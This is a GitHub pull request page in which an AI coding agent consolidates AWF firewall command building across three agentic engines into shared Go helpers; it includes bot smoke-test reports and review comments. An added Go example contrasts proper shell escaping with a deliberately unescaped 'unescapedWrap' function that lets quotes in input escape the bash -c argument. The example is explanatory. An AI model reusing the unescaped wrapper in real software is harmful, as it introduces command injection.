Consolidate AWF command building logic across all agentic engines #15810

Merged
pelikhan merged 10 commits into main from copilot/refactor-agentic-engine-interface
Feb 15, 2026

Copilot AI commented Feb 14, 2026

AWF (Agentic Workflow Firewall) command construction was duplicated across Claude, Codex, and Copilot engines with ~110-130 lines of identical logic per engine. This consolidates the logic into reusable helpers.

Changes

New module: pkg/workflow/awf_helpers.go

  • BuildAWFCommand() - Constructs complete AWF-wrapped command from configuration
  • BuildAWFArgs() - Assembles AWF arguments (mounts, domains, image tag, API proxy, SSL bump)
  • GetAWFCommandPrefix() - Resolves custom vs. standard AWF command
  • WrapCommandInShell() - Shell escapes and wraps engine command
  • AWFCommandConfig - Type-safe configuration struct

Constants extraction: pkg/constants/constants.go

// Environment variables
EnvVarPrompt = "GH_AW_PROMPT"
EnvVarMCPConfig = "GH_AW_MCP_CONFIG"
EnvVarSafeOutputs = "GH_AW_SAFE_OUTPUTS"
EnvVarMaxTurns = "GH_AW_MAX_TURNS"
EnvVarStartupTimeout = "GH_AW_STARTUP_TIMEOUT"
EnvVarToolTimeout = "GH_AW_TOOL_TIMEOUT"
EnvVarGitHubToken = "GH_AW_GITHUB_TOKEN"

// AWF configuration
AWFDefaultCommand = "sudo -E awf"
AWFProxyLogsDir = "/tmp/gh-aw/sandbox/firewall/logs"
AWFDefaultLogLevel = "info"

Engine refactoring

Before (per engine):

// ~110-130 lines of AWF argument building, command wrapping, and formatting
firewallConfig := getFirewallConfig(workflowData)
awfArgs := []string{"--tty", "--env-all", ...}
// ... mount sorting, domain formatting, SSL bump, etc.
awfCommand := "sudo -E awf"
shellWrappedCommand := fmt.Sprintf("/bin/bash -c '%s'", escapedCommand)
command = fmt.Sprintf(`set -o pipefail\n%s %s -- %s 2>&1 | tee -a %s`, ...)

After:

// ~25-40 lines
allowedDomains := Get{Engine}AllowedDomainsWithToolsAndRuntimes(...)
command = BuildAWFCommand(AWFCommandConfig{
    EngineName:     "claude",
    EngineCommand:  claudeCommandWithPath,
    WorkflowData:   workflowData,
    UsesTTY:        true,
    UsesAPIProxy:   e.SupportsLLMGateway() > 0,
    AllowedDomains: allowedDomains,
    PathSetup:      promptSetup,
})

Impact

  • Claude engine: -100 lines
  • Codex engine: -90 lines
  • Copilot engine: -85 lines
  • Net: +276 new, -275 removed = +1 line total
  • Single source of truth for AWF command building
  • Consistent tee flags, log escaping, and constant usage
  • 113 workflow .lock.yml files recompiled

Original prompt

Review agentic engine interface, and implementation of all custom agents.

  • Refactor common code
  • Extract constants
  • make it general and extensible
  • refactor AWF logic in helper


Changeset

  • Type: patch
  • Description: Consolidate AWF command construction and AWF constants so Claude, Codex, and Copilot reuse the same helpers

Generated by Changeset Generator
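
The escaping and wrapping steps that the description attributes to WrapCommandInShell() and BuildAWFCommand(), as an added Go example that is not the project's code. The lowercase function names, the awfConfig struct, the sample engine command and the --allow-domains, --log-level and --proxy-logs-dir flag spellings are assumptions, not taken from pkg/workflow/awf_helpers.go.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
	"strings"
)

// Values copied from the constants listed in the PR description.
const (
	awfDefaultCommand  = "sudo -E awf"
	awfProxyLogsDir    = "/tmp/gh-aw/sandbox/firewall/logs"
	awfDefaultLogLevel = "info"
)

// safeArg matches strings that POSIX sh reads as one literal word.
var safeArg = regexp.MustCompile(`^[A-Za-z0-9_@%+=:,./-]+$`)

// shellEscapeArg quotes a single argument for POSIX sh. Nothing is special
// inside single quotes, so only the quote itself needs handling: close the
// quoted run, emit an escaped quote, and reopen ('\'').
func shellEscapeArg(arg string) string {
	if safeArg.MatchString(arg) {
		return arg
	}
	return "'" + strings.ReplaceAll(arg, "'", `'\''`) + "'"
}

// shellJoinArgs escapes every argument and joins them with spaces.
func shellJoinArgs(args []string) string {
	quoted := make([]string, len(args))
	for i, a := range args {
		quoted[i] = shellEscapeArg(a)
	}
	return strings.Join(quoted, " ")
}

// wrapCommandInShell passes the whole engine command to bash as ONE argument.
func wrapCommandInShell(engineCommand string) string {
	return "/bin/bash -c " + shellEscapeArg(engineCommand)
}

// unescapedWrap is the same wrapper with the escaping step skipped
// (hypothetical, for comparison): a quote in the input ends the quoted run.
func unescapedWrap(engineCommand string) string {
	return fmt.Sprintf("/bin/bash -c '%s'", engineCommand)
}

// awfConfig is a hypothetical, trimmed stand-in for AWFCommandConfig.
type awfConfig struct {
	CommandPrefix  string // custom AWF command; empty selects the default
	EngineCommand  string
	AllowedDomains []string
	UsesTTY        bool
	LogFile        string
}

func buildAWFCommand(cfg awfConfig) string {
	// The prefix stays unquoted so "sudo -E awf" remains three words; a custom
	// prefix therefore has to come from trusted configuration.
	prefix := cfg.CommandPrefix
	if prefix == "" {
		prefix = awfDefaultCommand
	}
	var args []string
	if cfg.UsesTTY {
		args = append(args, "--tty")
	}
	args = append(args, "--env-all")
	// Sort a copy so the compiled command is deterministic and the caller's
	// slice is left untouched.
	domains := append([]string(nil), cfg.AllowedDomains...)
	sort.Strings(domains)
	args = append(args,
		"--allow-domains", strings.Join(domains, ","), // assumed flag name
		"--log-level", awfDefaultLogLevel, // assumed flag name
		"--proxy-logs-dir", awfProxyLogsDir, // assumed flag name
	)
	return fmt.Sprintf("set -o pipefail\n%s %s -- %s 2>&1 | tee -a %s",
		prefix, shellJoinArgs(args),
		wrapCommandInShell(cfg.EngineCommand), shellEscapeArg(cfg.LogFile))
}

func main() {
	// Constructed sample input: an engine command that itself contains quotes.
	cfg := awfConfig{
		EngineCommand:  `engine --label 'nightly run'`,
		AllowedDomains: []string{"github.com", "api.github.com"},
		UsesTTY:        true,
		LogFile:        "/tmp/gh-aw/agent stdio.log",
	}
	fmt.Println("unescaped:", unescapedWrap(cfg.EngineCommand))
	fmt.Println("escaped:  ", wrapCommandInShell(cfg.EngineCommand))
	fmt.Println(buildAWFCommand(cfg))
}
```

In the unescaped form the first quote inside the engine command closes the `-c` argument early, so the outer shell sees several words where one was intended; the escaped form keeps the command a single argument.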

Copilot AI and others added 5 commits February 14, 2026 23:39
Co-authored-by: pelikhan <4175913+pelikhan@users.noreply.github.com>
Co-authored-by: pelikhan <4175913+pelikhan@users.noreply.github.com>
Co-authored-by: pelikhan <4175913+pelikhan@users.noreply.github.com>
…ove pathSetup from WrapCommandInShell

Co-authored-by: pelikhan <4175913+pelikhan@users.noreply.github.com>
Co-authored-by: pelikhan <4175913+pelikhan@users.noreply.github.com>
Copilot AI changed the title from "[WIP] Refactor agentic engine interface and custom agents implementation" to "Consolidate AWF command building logic across agentic engines" Feb 14, 2026
Copilot AI requested a review from pelikhan February 14, 2026 23:54
@pelikhan

@copilot recompile

Co-authored-by: pelikhan <4175913+pelikhan@users.noreply.github.com>
@pelikhan

@copilot keep working

Copilot AI and others added 2 commits February 15, 2026 01:20
Co-authored-by: pelikhan <4175913+pelikhan@users.noreply.github.com>
Co-authored-by: pelikhan <4175913+pelikhan@users.noreply.github.com>

Copilot AI commented Feb 15, 2026

@copilot keep working

Completed the refactoring! All three main engines (Claude, Codex, and Copilot) now use the consolidated AWF helper functions.

Latest commits:

  • da6894f - Refactored Copilot engine (-85 lines)
  • 59e5d25 - Recompiled 103 workflows with new Copilot code

Total impact:

  • ~275 lines of duplicated AWF code eliminated
  • All engine tests pass (Claude: 34/34, Codex: 14/14, Copilot: 22/22)
  • 113 workflows successfully recompiled

Warning

Firewall rules blocked me from connecting to one or more addresses (expand for details)

I tried to connect to the following addresses, but was blocked by firewall rules:

Copilot AI changed the title from "Consolidate AWF command building logic across agentic engines" to "Consolidate AWF command building logic across all agentic engines" Feb 15, 2026
@pelikhan pelikhan added the smoke label Feb 15, 2026
@github-actions

github-actions bot commented Feb 15, 2026

✨ The prophecy is fulfilled... Smoke Codex has completed its mystical journey. The stars align. 🌟

@github-actions

📰 BREAKING: Smoke Copilot is now investigating this pull request. Sources say the story is developing...

@github-actions

github-actions bot commented Feb 15, 2026

Changeset Generator completed successfully!

@github-actions

🧪 Smoke Temporary ID is now testing temporary ID functionality...

@github-actions

🧪 Smoke Project is now testing project operations...

@github-actions

github-actions bot commented Feb 15, 2026

Smoke Copilot SDK failed. Please review the logs for details.

@github-actions

github-actions bot commented Feb 15, 2026

🎬 THE END Smoke Claude MISSION: ACCOMPLISHED! The hero saves the day! ✨

@github-actions

Agent Container Tool Check ✅

Tool Status Version
bash 5.2.21
sh available
git 2.52.0
jq 1.7
yq 4.52.2
curl 8.5.0
gh 2.86.0
node 20.20.0
python3 3.12.3
go 1.24.13
java 21.0.10
dotnet 10.0.102

Result: 12/12 tools available ✅

All common development tools are accessible in the agent container environment.

AI generated by Agent Container Smoke Test

@github-actions

Smoke Temporary ID completed successfully. Temporary ID validation passed.

@github-actions

Smoke Project completed successfully. All project operations validated.

@github-actions

Merged PRs:

  • Switch review workflows to submit_pull_request_review
  • Fix awf logs command failure when binary not installed

GitHub MCP: ✅
Serena MCP (activate+find_symbol): ✅
Playwright (title contains GitHub): ✅
File write+cat: ✅
Build (make build): ✅
Overall: PASS

AI generated by Smoke Codex

@github-actions github-actions bot left a comment

💥 Automated smoke test review - all systems nominal!

💥 [THE END] — Illustrated by Smoke Claude for issue #15810

@github-actions

Smoke Test Results

PRs Reviewed:

Test Results:

  • ✅ GitHub MCP
  • ✅ Safe Inputs GH CLI
  • ✅ Playwright
  • ✅ File I/O
  • ✅ Build System
  • ✅ Discussion Interaction
  • ✅ PR Review

Overall: PASS

§22027664550

AI generated by Smoke Copilot

@github-actions github-actions bot left a comment

Excellent refactoring - consolidates AWF command building into shared helpers and extracts AWF constants. All engines now use consistent configuration.

📰 BREAKING: Report filed by Smoke Copilot for issue #15810

awfCommand,
shellJoinArgs(awfArgs),
shellWrappedCommand,
shellEscapeArg(config.LogFile))
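
Review bot: awfCommand on the first line is the one argument here that reaches the shell without passing through shellJoinArgs or shellEscapeArg, and the description says GetAWFCommandPrefix() can return a custom command in place of the default. It has to stay unquoted so that "sudo -E awf" remains three words, so a doc comment on the helper stating that a custom prefix is trusted workflow configuration, or validation at the point where it is read, would make that trust boundary explicit.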

Good consolidation! BuildAWFCommand nicely unifies AWF setup across all engines.

const AWFProxyLogsDir = "/tmp/gh-aw/sandbox/firewall/logs"

// AWFDefaultLogLevel is the default log level for AWF
const AWFDefaultLogLevel = "info"
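
Review bot: AWFProxyLogsDir on the first line is a fixed, predictable path under /tmp, and the visible lines do not say who creates the directory or with what mode. A doc comment in the style of the one on AWFDefaultLogLevel, stating that the workflow creates the directory before awf starts and does not expect it to pre-exist, would record that assumption for anyone running this on a runner shared between jobs.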

Nice extraction of AWF constants - much cleaner than hardcoded values.

@github-actions

📰 VERDICT: Smoke Copilot has concluded. All systems operational. This is a developing story. 🎤

@pelikhan pelikhan marked this pull request as ready for review February 15, 2026 01:50
Copilot AI review requested due to automatic review settings February 15, 2026 01:50
@pelikhan pelikhan merged commit 5576b5a into main Feb 15, 2026
1 check passed
@pelikhan pelikhan deleted the copilot/refactor-agentic-engine-interface branch February 15, 2026 01:50

Copilot AI left a comment

Pull request overview

This PR consolidates duplicated AWF (Agentic Workflow Firewall) command building logic from Claude, Codex, and Copilot engines into a shared helper module. The refactoring reduces ~275 lines of duplicated code across three engines while extracting common constants for maintainability.

Changes:

  • Created new pkg/workflow/awf_helpers.go with reusable AWF command building functions
  • Extracted AWF-related constants to pkg/constants/constants.go
  • Refactored Claude, Codex, and Copilot engines to use the shared helpers
  • Recompiled 113 workflow lock files with consistent command wrapping (/bin/bash -c wrapper and tee -a flag)

Reviewed changes

Copilot reviewed 119 out of 119 changed files in this pull request and generated no comments.

File | Description
pkg/constants/constants.go | Added 7 environment variable constants and 3 AWF configuration constants
pkg/workflow/awf_helpers.go | New module with AWF command building helpers (248 lines)
.github/workflows/*.lock.yml | 113 workflow lock files updated with consistent AWF command format
.changeset/patch-consolidate-awf-command.md | Changeset documenting the refactoring
